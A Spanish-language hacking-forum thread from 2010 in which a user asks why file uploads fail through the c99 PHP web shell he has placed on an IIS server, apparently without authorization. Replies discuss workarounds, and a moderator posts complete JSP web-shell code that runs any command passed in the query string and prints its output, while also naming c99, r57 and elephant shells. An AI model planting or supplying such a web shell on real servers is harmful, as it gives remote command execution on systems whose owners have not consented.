elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Shell para IIS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Shell para IIS  (Leído 3,209 veces)
Halos

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Shell para IIS
« en: 4 Febrero 2010, 01:06 am »

Buenas! No tengo mucha experiencia con shells así que me gustaría que me aclaraseis algunas dudillas que tengo.

He subido una shell a un servidor, la famosa c99. He intentado subir ficheros a través de ella pero nanai, no aparecen. Y no es por problemas de permisos, porque se ven los permisos de la carpeta rwxrwxrwx y porque sí he podido mover archivos a la carpeta a la que quiero subir el nuevo archivo. Mi duda es si esta shell está más orientada a servidores linux y para un servidor IIS debería utilizar otra. Pienso que el fallo puede ser por el SO, aunque si la shell funciona en php debería de funcionar independientemente del SO, ¿no? Pensé también que podría ser culpa del no-script, pero permitiendo los scripts en firefox y utilizando el chrome, sin bloqueo de script, tampoco. La verdad es que no sé como funcionan estas shells internamente, y sería interesante saberlo, por curiosidad, para solucionar esto y para saber bien lo que hago  ;D

Un saludo!
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Shell para IIS
« Respuesta #1 en: 4 Febrero 2010, 01:12 am »

no tiene nada que ver ni el OS ni el explorador, php es php en linux en windows y en la conchinchina

como has intentado subir los archivos?
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Shell para IIS
« Respuesta #2 en: 4 Febrero 2010, 04:21 am »

claro , si funciona en php tendria que subir , capas que no podes subir archivos , pero si podes ejecutar comandos podrias usar algo con fopen y crear tu archivo
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Shell para IIS
« Respuesta #3 en: 4 Febrero 2010, 09:12 am »

si necesitas para jsp acá tienes una:

Código
  1. <%@ page import="java.io.*, java.net.*" %>
  2.  
  3. <%
  4.  
  5.       String queryString = request.getQueryString();
  6.  
  7.  
  8.  
  9.       if (queryString == null) return;
  10.  
  11.  
  12.  
  13.       String line;
  14.  
  15.       Process p = Runtime.getRuntime().exec(URLDecoder.decode(queryString));
  16.  
  17.       BufferedReader input = new BufferedReader(new InputStreamReader(p.getInputStream()));
  18.  
  19.       while ((line = input.readLine()) != null) {
  20.  
  21.               out.println(line);
  22.  
  23.       }
  24.  
  25.   input.close();
  26.  
  27. %>    
  28.  
  29. <form method=POST>
  30.  
  31. <input type=text name=queryString>
  32.  
  33. <input type=submit>
  34.  
  35. </form>

Si el servidor soporta php usas la c99, r57, el elephant o lo que se te ocurra.
En línea

Halos

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: Shell para IIS
« Respuesta #4 en: 4 Febrero 2010, 15:18 pm »

Gracias por las respuestas y por la shell jsp!  ;)

Una duda, entre c99 y r57, ¿alguna está más recomendada para algún uso en concreto? ¿O es solo cuestión de gustos como KDE o GNOME?
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Shell para IIS
« Respuesta #5 en: 4 Febrero 2010, 15:30 pm »

.___________________.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines